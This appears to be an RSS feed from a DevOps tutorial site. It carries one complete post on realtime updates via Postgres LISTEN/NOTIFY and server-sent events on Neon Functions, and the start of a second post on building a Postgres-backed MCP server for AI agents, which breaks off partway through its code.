<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>DevOps Daily</title>
    <link>https://devops-daily.com</link>
    <description>The latest DevOps news, tutorials, and guides</description>
    <language>en</language>
    <lastBuildDate>Thu, 02 Jul 2026 09:55:53 GMT</lastBuildDate>
    <atom:link href="https://devops-daily.com/feed.xml" rel="self" type="application/rss+xml"/>
    
    <item>
      <title><![CDATA[Realtime Without a WebSocket Service]]></title>
      <link>https://devops-daily.com/posts/neon-functions-realtime-without-websockets</link>
      <description><![CDATA[Live counters, presence, notifications: the reflex is to add a websocket service to run and pay for. But if your data already lives in Postgres, it has a pub/sub built in. Here is realtime fan-out with Postgres LISTEN/NOTIFY and SSE on a Neon Function, tested with two live subscribers.]]></description>
      <pubDate>Thu, 02 Jul 2026 17:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-realtime-without-websockets</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[functions]]></category><category><![CDATA[postgres]]></category><category><![CDATA[realtime]]></category><category><![CDATA[sse]]></category><category><![CDATA[serverless]]></category>
      <content:encoded><![CDATA[<p>The moment a feature needs to update live, a live counter, a presence indicator, a &quot;new message&quot; badge, an activity feed, the reflex is to reach for a websocket service. Pusher, Ably, a Socket.IO server, a stateful Node process parked next to your stateless app. That is one more thing to deploy, scale, secure, and pay for, and it exists mostly to move small events from one place to a bunch of connected browsers.</p>
<p>If your data already lives in Postgres, you already have a message bus for that. Postgres ships with <code>LISTEN</code> and <code>NOTIFY</code>, a lightweight publish/subscribe system built into the database. Pair it with server-sent events from a serverless function and you can fan realtime updates out to every connected client without standing up any realtime infrastructure at all. In this post I build exactly that on a Neon Function, explain the one part that is subtle on serverless, and prove it works with two live subscribers. The <a href="https://github.com/The-DevOps-Daily/neon-realtime-demo">repo</a> is at the end.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Postgres <code>LISTEN</code>/<code>NOTIFY</code> is a built-in pub/sub. <code>NOTIFY channel, &#39;payload&#39;</code> delivers to every connection that has run <code>LISTEN channel</code>.</li>
<li>A serverless function holds each browser&#39;s SSE connection open and keeps one Postgres <code>LISTEN</code> connection. On a write, the app calls <code>pg_notify</code>, and every isolate pushes the event to its SSE clients.</li>
<li>The subtle part on serverless: the runtime runs several isolates, each with its own in-memory set of clients. <code>LISTEN</code>/<code>NOTIFY</code> is what fans an event across all of them; an in-process broadcast alone would only reach one isolate&#39;s clients.</li>
<li>One real gotcha: <code>LISTEN</code> needs a session, so it must use a direct (unpooled) connection, not the transaction pooler.</li>
<li>It is fan-out for small live events, not a durable queue. For guaranteed delivery or bidirectional low-latency you still want a real broker or websockets.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>A Neon project on the platform preview (Functions, <code>us-east-2</code>)</li>
<li>The Neon CLI (<code>npm i -g neon</code>, then <code>neon login</code>)</li>
<li>Familiarity with Postgres and with SSE / <code>EventSource</code> on the client</li>
</ul>
<h2 id="h2-the-two-pieces" class="group relative scroll-mt-24">
        <a href="#h2-the-two-pieces" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The two pieces
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-two-pieces"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><strong>Postgres LISTEN/NOTIFY</strong> is a pub/sub channel inside the database. A connection subscribes with <code>LISTEN counter_updates</code>, and any connection (from anywhere) that runs <code>NOTIFY counter_updates, &#39;42&#39;</code> causes Postgres to deliver that payload to every subscriber. No extra service, no broker to run; it is a feature of the database you already have.</p>
<p><strong>Server-sent events (SSE)</strong> are the other half. SSE is a long-lived HTTP response that streams <code>data:</code> frames to the browser, consumed with the built-in <code>EventSource</code> API. It is one-directional (server to client), which is exactly the shape of most realtime UI: the server has news, the browser wants it. And because it is just an HTTP response, a serverless function can serve it.</p>
<p>Put them together: the function streams SSE to browsers and relays anything it hears on a Postgres channel.</p>
<h2 id="h2-the-part-that-is-subtle-on-serverless" class="group relative scroll-mt-24">
        <a href="#h2-the-part-that-is-subtle-on-serverless" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The part that is subtle on serverless
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-part-that-is-subtle-on-serverless"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the trap. A function under load does not run as one process; the runtime spins up several isolates in parallel. Each isolate has its own memory, so each keeps its own set of open SSE connections. If you only broadcast in-process, a client connected to isolate A never sees an event triggered through isolate B.</p>
<p><code>LISTEN</code>/<code>NOTIFY</code> is what closes that gap. Every isolate opens its own <code>LISTEN</code> connection to Postgres. When any code anywhere calls <code>NOTIFY</code>, Postgres delivers it to all of those connections, so every isolate gets the event and pushes it to its own clients. Postgres is the shared fan-out point that the isolates do not otherwise have.</p>
<pre><code class="hljs language-typescript"><span class="hljs-comment">// One dedicated LISTEN connection per isolate. LISTEN needs a real session,</span>
<span class="hljs-comment">// so use the DIRECT (unpooled) URL, not the transaction pooler.</span>
<span class="hljs-keyword">const</span> listener = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Client</span>({ <span class="hljs-attr">connectionString</span>: env.<span class="hljs-property">postgres</span>.<span class="hljs-property">databaseUrlUnpooled</span> });
<span class="hljs-keyword">await</span> listener.<span class="hljs-title function_">connect</span>();
<span class="hljs-keyword">await</span> listener.<span class="hljs-title function_">query</span>(<span class="hljs-string">&#x27;LISTEN counter_updates&#x27;</span>);

<span class="hljs-comment">// SSE connections held open by THIS isolate.</span>
<span class="hljs-keyword">const</span> clients = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Set</span>&lt;<span class="hljs-title class_">ReadableStreamDefaultController</span>&lt;<span class="hljs-title class_">Uint8Array</span>&gt;&gt;();

listener.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;notification&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">msg</span>) =&gt;</span> {
  <span class="hljs-keyword">const</span> frame = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TextEncoder</span>().<span class="hljs-title function_">encode</span>(<span class="hljs-string">`data: <span class="hljs-subst">${msg.payload}</span>\n\n`</span>);
  <span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> c <span class="hljs-keyword">of</span> clients) c.<span class="hljs-title function_">enqueue</span>(frame); <span class="hljs-comment">// push to this isolate&#x27;s browsers</span>
});
</code></pre><p>The write path is a normal query plus a <code>NOTIFY</code>:</p>
<pre><code class="hljs language-typescript">app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/increment&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">const</span> [row] = <span class="hljs-keyword">await</span> db
    .<span class="hljs-title function_">insert</span>(counters)
    .<span class="hljs-title function_">values</span>({ <span class="hljs-attr">id</span>: <span class="hljs-number">1</span>, <span class="hljs-attr">value</span>: <span class="hljs-number">1</span> })
    .<span class="hljs-title function_">onConflictDoUpdate</span>({ <span class="hljs-attr">target</span>: counters.<span class="hljs-property">id</span>, <span class="hljs-attr">set</span>: { <span class="hljs-attr">value</span>: sql<span class="hljs-string">`<span class="hljs-subst">${counters.value}</span> + 1`</span> } })
    .<span class="hljs-title function_">returning</span>({ <span class="hljs-attr">value</span>: counters.<span class="hljs-property">value</span> });
  <span class="hljs-comment">// Fan the new value out to every isolate, and thus every browser.</span>
  <span class="hljs-keyword">await</span> pool.<span class="hljs-title function_">query</span>(<span class="hljs-string">&#x27;SELECT pg_notify($1, $2)&#x27;</span>, [<span class="hljs-string">&#x27;counter_updates&#x27;</span>, <span class="hljs-title class_">String</span>(row.<span class="hljs-property">value</span>)]);
  <span class="hljs-keyword">return</span> c.<span class="hljs-title function_">json</span>({ <span class="hljs-attr">value</span>: row.<span class="hljs-property">value</span> });
});
</code></pre><p>And the SSE endpoint just registers the browser and streams:</p>
<pre><code class="hljs language-typescript">app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/events&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">const</span> stream = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ReadableStream</span>&lt;<span class="hljs-title class_">Uint8Array</span>&gt;({
    <span class="hljs-title function_">start</span>(<span class="hljs-params">controller</span>) {
      clients.<span class="hljs-title function_">add</span>(controller);
      <span class="hljs-comment">// send the current value immediately so a new tab is correct on load</span>
      <span class="hljs-title function_">readCount</span>().<span class="hljs-title function_">then</span>(<span class="hljs-function">(<span class="hljs-params">v</span>) =&gt;</span> controller.<span class="hljs-title function_">enqueue</span>(<span class="hljs-title function_">encode</span>(<span class="hljs-string">`data: <span class="hljs-subst">${v}</span>\n\n`</span>)));
    },
    <span class="hljs-title function_">cancel</span>(<span class="hljs-params"></span>) {
      <span class="hljs-comment">/* remove this controller from clients */</span>
    },
  });
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(stream, {
    <span class="hljs-attr">headers</span>: { <span class="hljs-string">&#x27;Content-Type&#x27;</span>: <span class="hljs-string">&#x27;text/event-stream&#x27;</span>, <span class="hljs-string">&#x27;Cache-Control&#x27;</span>: <span class="hljs-string">&#x27;no-cache&#x27;</span> },
  });
});
</code></pre><div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><code>LISTEN</code> holds a session-level subscription, which the transaction pooler (PgBouncer in transaction mode) does not support. Use the direct, unpooled connection string for the listener (Neon injects it as <code>DATABASE_URL_UNPOOLED</code>). Keep using the pooled URL for your normal queries. Getting this wrong is the usual reason &quot;notifications never arrive.&quot;</p>
</div></div></div><h2 id="h2-proving-it-works" class="group relative scroll-mt-24">
        <a href="#h2-proving-it-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Proving it works
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-proving-it-works"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>I deployed the counter as a Neon Function and connected two independent SSE subscribers, then fired three increments. Every subscriber should see its starting value on connect and then each new value as it happens. Here is the actual run:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;two subscribers, one NOTIFY each&quot;,&quot;prompt&quot;:&quot;$&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;two browsers (A and B) open EventSource on /events; both get the current value&quot;},{&quot;cmd&quot;:&quot;node realtime-test.mjs $URL&quot;,&quot;output&quot;:&quot;start count: 0\n[A] &lt;- 0\n[B] &lt;- 0&quot;},{&quot;comment&quot;:&quot;POST /increment writes the row and calls pg_notify once&quot;},{&quot;cmd&quot;:&quot;curl -X POST $URL/increment&quot;,&quot;output&quot;:&quot;{ \&quot;value\&quot;: 1 }&quot;},{&quot;comment&quot;:&quot;both subscribers receive it live, from the single NOTIFY&quot;},{&quot;cmd&quot;:&quot;&quot;,&quot;output&quot;:&quot;[A] &lt;- 1\n[B] &lt;- 1&quot;},{&quot;cmd&quot;:&quot;curl -X POST $URL/increment  # x2 more&quot;,&quot;output&quot;:&quot;[A] &lt;- 2\n[B] &lt;- 2\n[A] &lt;- 3\n[B] &lt;- 3&quot;},{&quot;comment&quot;:&quot;final tally from the two independent streams&quot;},{&quot;cmd&quot;:&quot;&quot;,&quot;output&quot;:&quot;A received: 0, 1, 2, 3\nB received: 0, 1, 2, 3&quot;}]}"></div><p>Both streams saw every value. Neither subscriber talked to the other, and there is no websocket server anywhere in this picture; the events traveled browser → function → Postgres <code>NOTIFY</code> → every function isolate → every browser.</p>
<h2 id="h2-websocket-service-vs-listennotify-sse" class="group relative scroll-mt-24">
        <a href="#h2-websocket-service-vs-listennotify-sse" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          WebSocket service vs LISTEN/NOTIFY + SSE
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-websocket-service-vs-listennotify-sse"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><table>
<thead>
<tr>
<th></th>
<th>Dedicated websocket service</th>
<th>LISTEN/NOTIFY + SSE on a function</th>
</tr>
</thead>
<tbody><tr>
<td>Extra infrastructure</td>
<td>A service to run, scale, secure</td>
<td>None; uses Postgres + the function</td>
</tr>
<tr>
<td>Direction</td>
<td>Bidirectional</td>
<td>Server to client (SSE)</td>
</tr>
<tr>
<td>Fan-out bus</td>
<td>The service</td>
<td>Postgres <code>NOTIFY</code></td>
</tr>
<tr>
<td>Delivery</td>
<td>Often buffered / retried</td>
<td>Best-effort; dropped if no listener</td>
</tr>
<tr>
<td>Best for</td>
<td>Chat, cursors, games, huge fan-out</td>
<td>Live counters, feeds, notifications, presence</td>
</tr>
</tbody></table>
<h2 id="h2-where-this-stops-being-enough" class="group relative scroll-mt-24">
        <a href="#h2-where-this-stops-being-enough" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where this stops being enough
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-this-stops-being-enough"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>This pattern is a genuine &quot;delete a service&quot; win for a large class of realtime features, but be honest about its edges:</p>
<ul>
<li><strong>It is not a durable queue.</strong> <code>NOTIFY</code> is fire-and-forget. If nobody is listening at that instant, the message is gone. That is fine for a live UI that re-reads state on reconnect; it is not fine for guaranteed delivery or work queues.</li>
<li><strong>Payloads are small.</strong> Postgres caps a <code>NOTIFY</code> payload at 8000 bytes. Send an id or a small value and let clients fetch details, rather than shipping large blobs through the channel.</li>
<li><strong>SSE is one-way.</strong> For low-latency bidirectional traffic (multiplayer, live cursors, collaborative editing) a websocket is still the right tool.</li>
<li><strong>At very high scale</strong> a dedicated broker earns its keep. This shines at the small-to-medium fan-out that most apps actually need, without the standing infrastructure.</li>
</ul>
<h2 id="h2-the-repo" class="group relative scroll-mt-24">
        <a href="#h2-the-repo" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The repo
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-repo"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The full counter, backend function plus a small web client, is here:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-realtime-demo"></div><h2 id="h2-wrapping-up" class="group relative scroll-mt-24">
        <a href="#h2-wrapping-up" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wrapping up
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-wrapping-up"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Realtime does not always mean a websocket service. For the common cases, a live number, a badge, a feed, an activity stream, Postgres <code>LISTEN</code>/<code>NOTIFY</code> is a pub/sub you already run, and SSE from a serverless function is enough to get those events to the browser. On Neon the function lives on the branch next to Postgres, so the listener connection is a local hop and the whole realtime path is one deploy, no separate service to operate. Reach for a real broker or websockets when you need durability or two-way low latency; reach for this when you just want the UI to update and would rather not run another box to make it happen.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[A Postgres-Backed MCP Server in ~20 Lines]]></title>
      <link>https://devops-daily.com/posts/neon-functions-postgres-mcp-server</link>
      <description><![CDATA[Most of what an MCP server does is run database queries on behalf of an AI agent. So I put one right next to the database. Here is a Postgres-backed MCP server built on Neon Functions, deployed onto a database branch, with the code, a live client test, and the repo.]]></description>
      <pubDate>Thu, 02 Jul 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-postgres-mcp-server</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[mcp]]></category><category><![CDATA[postgres]]></category><category><![CDATA[functions]]></category><category><![CDATA[ai-agents]]></category><category><![CDATA[serverless]]></category>
      <content:encoded><![CDATA[<p>The Model Context Protocol is how an AI agent gets tools. You stand up an MCP server, it advertises a set of tools with typed inputs, and the agent calls them. For a huge number of real MCP servers, those tools are thin wrappers around a database: search these records, create this row, update that field. The server is mostly a translator between JSON-RPC and SQL.</p>
<p>Which raises an obvious question. If an MCP server spends its life talking to Postgres, why does it so often run somewhere far away from Postgres? The usual setup is an MCP server on one host and the database on another, so every tool call pays a network round trip to reach the data it needs.</p>
<p>Neon Functions let you skip that. You deploy the MCP server as a function that lives on the same database branch it queries, in the same region, so the server-to-Postgres hop is a local one. In this post I build a Postgres-backed MCP server, deploy it onto a branch, connect a real MCP client, and show what the round trips actually look like. The whole thing is about twenty lines of interesting code, and the <a href="https://github.com/The-DevOps-Daily/neon-mcp-demo">repo</a> is at the end.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-tldr"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>An MCP server that exposes database tools is mostly network plus queries. Running it next to the database removes a cross-region hop from every tool call.</li>
<li>Neon Functions deploy your MCP server onto a database branch, co-located with Postgres. The server-to-database query is a same-region hop of a millisecond or two, not a transatlantic one.</li>
<li>The core is small: define a Drizzle schema, register a tool whose handler runs a query, and expose the MCP server over the streamable HTTP transport at <code>/mcp</code>. That is the ~20 lines.</li>
<li>Any MCP client that speaks streamable HTTP connects to it: <code>mcporter</code>, the MCP SDK, or an agent like Claude or Cursor pointed at the URL.</li>
<li>Each branch gets its own function URL, so every preview or test branch can have its own isolated MCP endpoint over its own copy of the data.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-prerequisites"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><ul>
<li>Node.js 20+ and the Neon CLI (<code>npm i -g neon</code>, then <code>neon login</code>)</li>
<li>A Neon account with the platform preview enabled (Functions, new <code>us-east-2</code> projects)</li>
<li>Basic familiarity with Postgres and TypeScript</li>
<li>Optional: an MCP client to point at it, such as <code>mcporter</code>, Claude, or Cursor</li>
</ul>
<h2 id="h2-what-an-mcp-server-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-an-mcp-server-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What an MCP server actually is
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-an-mcp-server-actually-is"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Strip away the branding and an MCP server is a small RPC service. It speaks JSON-RPC over a transport, and it advertises a list of tools. Each tool has a name, a description, and an input schema. When the agent decides to call a tool, the server runs a handler and returns a result. That is the whole contract.</p>
<p>The transport here is streamable HTTP: the client POSTs JSON-RPC messages to a single endpoint (<code>/mcp</code>) and reads responses back, with server-sent events for anything streamed. It works over plain HTTPS, which is exactly what a serverless function serves, so an MCP server and a Neon Function are a natural fit.</p>
<h2 id="h2-the-20-lines" class="group relative scroll-mt-24">
        <a href="#h2-the-20-lines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The ~20 lines
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-20-lines"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the core of a Postgres-backed MCP server. A schema, one tool whose handler runs a query, and the wiring to expose it over streamable HTTP. Everything else is more of the same.</p>
<pre><code class="hljs language-typescript"><span class="hljs-keyword">import</span> { <span class="hljs-title class_">Hono</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono&#x27;</span>;
<span class="hljs-keyword">import</span> { drizzle } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm/node-postgres&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">Pool</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { ilike } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm&#x27;</span>;
<span class="hljs-keyword">import</span> { z } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;zod&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">McpServer</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@modelcontextprotocol/sdk/server/mcp.js&#x27;</span>;
